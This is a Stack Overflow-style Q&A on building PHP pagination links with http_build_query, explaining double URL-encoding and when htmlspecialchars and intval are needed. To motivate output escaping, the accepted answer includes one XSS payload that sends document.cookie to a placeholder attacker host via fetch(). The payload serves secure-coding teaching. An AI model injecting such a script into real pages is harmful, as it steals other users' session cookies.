# How To Use http_build_query With Encodings?

Tags: php, urlencode, htmlspecialchars

I am trying to build a Pagination Section, like you see on Google Search Result Pages.
Example:
Page: 12345678910

Building the pagination section using http_build_query. I am not sure if I put the encodings in the right places or not. urlencode(), intval(), htmlspecialchars().

Url looks like this:
https://localhost/search.php?search=cars&table=links&column=keyword&max=10&page=1

```
<?php

$row_count = 10;
$total_pages = ceil($row_count/$_GET['max']);
$selfpage = rawurlencode(basename(__FILE__)); //Is rawurlencode() ok here ?

$query_params = array(
    'search' => urlencode($_GET['search']),
    'table' => urlencode($_GET['table']),
    'column' => urlencode($_GET['column']),
    'max' => intval($_GET['max']),
    'page_no' => intval($_GET['page_no'])
    
);

for ($i = 1; $i <= $total_pages; $i++) {
    
    $url = $selfpage . "?" . http_build_query($query_params);
    echo '<a href="' . htmlspecialchars($url) . '">'; //Is htmlspecialchars() ok here ?

    if ($_GET['page_no'] == $i) 
    { 
        echo '<b>' . intval($i) . '</b>'; //Is intval() ok here ?
    } 
    else 
    {
        echo intval($i); //Is intval() ok here ?
    }

    echo '</a>';
}

?>
```

On which lines I am worried that I might have gone wrong, I have written comments asking if I did that particular line correct or not. Kindly, notice the comments.

I don't want to be double encoding either.
If I got things wrong then I'd appreciate if someone can edit my code and show me how I should have done it.

Thanks

Comment: What is the output of your code when using special characters that should be URL-encoded (like a space, `/` or `%` character) and how does that match up with what you expect? With "Am I doing this correctly?" type questions, the first reaction is usually "Well, what happens when you run it?"

Comment: @rickendenhaan, I don't know as I don't have these chars in my url. My url code is this: $url = $selfpage."?".http_build_query($query_params);
And my url looks like this:
https://localhost/Templates/http_build_query.php?search=&table=&column=&max=8&page_no=9

Comment: You don't need `urlencode` or `htmlspecialchars` when using `http_build_query` - `urlencode` is helpful when you don't use `http_build_query` and `htmlspecialchars` is completely unrelated to URLs.

Comment: @IVO-GELOV, Why urlencode() not needed when using http_build_query() ? Is it because urlencode() is built into it ? Do you mind editing my code and showing me how you yourself would code it ? Thanks!

Comment: `http_build_query()` already performs URL-escaping. If you give it something that has already gone through `urlencode()`, it will double-encode the `%` sign. So for example, if your `search` parameter contains a `/` character, with your current code, `urlencode()` will turn that into `%2F` and then `http_build_query()` will turn it into `%252F`. Basically, every use of `rawurlencode()`, `urlencode()` and `htmlspecialchars()` in your code is unnecessary.

Comment: @rickdenhaan,Thanks. But, I'd appreciate it if you edit my code and paste it on this page so I can go and accept your answer and close this thread. - Regards!

Answer (score 1, accepted):

```
$selfpage = rawurlencode(basename(__FILE__)); //Is rawurlencode() ok here ?
```

Using `rawurlencode()` here is unnecessary. It can't hurt, but it is intended to make text safe for use in URLs if it contains unsafe characters. Your file is named `search.php` which does not need encoding.

Using `rawurlencode()` *would* be useful if you have special characters in your file name, like a space or accented characters.

```
$query_params = array(
    'search' => urlencode($_GET['search']),
    'table' => urlencode($_GET['table']),
    'column' => urlencode($_GET['column']),
    'max' => intval($_GET['max']),
    'page_no' => intval($_GET['page_no'])
);

// and
$url = $selfpage . "?" . http_build_query($query_params);
```

`http_build_query()` already takes care of URL-encoding. You should not manually use `urlencode()` on values that you will pass through `http_build_query()` later. This will lead to double-escaping.

Let's say someone accesses your page using `?search=a%2Fb`. `$_GET['search']` will be `"a/b"`. Passing that through `urlencode()` will turn `$query_params['search']` into `"a%2Fb"`. But passing *that* through `http_build_query()` will see the `%` sign as needing escaping, so `$url` will contain `search=a%252Fb`.

You don't want that, so don't use `urlencode()`.

The `intval()` usage is not strictly necessary, but it can't hurt either. It sanitizes the user input to a number, but you're not using the `max` and `page_no` values from the `$query_params` anywhere. In all places where you use those values as an integer value, you're still using the raw values from `$_GET` (in the calculation for `$total_pages` and to check for the current page within the loop). Using `intval()` *there* would make more sense than using it here in `$query_params`.

```
echo '<a href="' . htmlspecialchars($url) . '">'; //Is htmlspecialchars() ok here ?
```

`htmlspecialchars()` is used to prevent script injection. Using it on a URL you're building yourself in a sanitized way is not necessary.

Use `htmlspecialchars()` if you're displaying user input on your page, for example:

```
You've searched for "<?php echo $_GET['search']; ?>".
```

If you have something like that, a user could theoretically visit your page and inject some Javascript code using, for example, `?search=<script>fetch('https://my-evil-server.com/store-cookies.php?cookie=' + document.cookie);</script>` (properly URL-escaped of course, this is just for readability).

Obviously, just stealing your own cookies is pointless. But what if you save the value of `$_GET['search']` into a database and show it to other, logged in, users? Then this would cause the cookies of those other users to be sent to this malicious user. Not good.

Using `htmlspecialchars()` will prevent this:

```
You've searched for "<?php echo htmlspecialchars($_GET['search']); ?>".
```

Now, at the very least, the `<` and `>` characters will be replaced by `&lt;` and `&gt;`, which means that piece of javascript will be presented on the page as human-readable text, instead of browser-executable code. It will look stupid, but at least you're not sending your users' cookies to a hacker.

```
for ($i = 1; $i <= $total_pages; $i++) {
    echo intval($i); //Is intval() ok here ?
}
```

Here, `intval()` is completely unnecessary. `$i` is already an integer value, so `intval()` will do nothing.

So cleaned up, your final code could look something like this:

```
<?php

$row_count = 10;
$total_pages = ceil($row_count/$_GET['max']);
$selfpage = basename(__FILE__);

$query_params = array(
    'search' => $_GET['search'],
    'table' => $_GET['table'],
    'column' => $_GET['column'],
    'max' => $_GET['max'],
    'page_no' => $_GET['page_no']
);

for ($i = 1; $i <= $total_pages; $i++) {
    // I noticed you removed this in your last edit, but without it
    // you will just output the same URL for every page
    $query_params['page_no'] = $i;
    
    $url = $selfpage . "?" . http_build_query($query_params);
    echo '<a href="' . $url . '">';

    if ($_GET['page_no'] == $i) 
    { 
        echo '<b>' . $i . '</b>';
    } 
    else 
    {
        echo $i;
    }

    echo '</a>';
}
```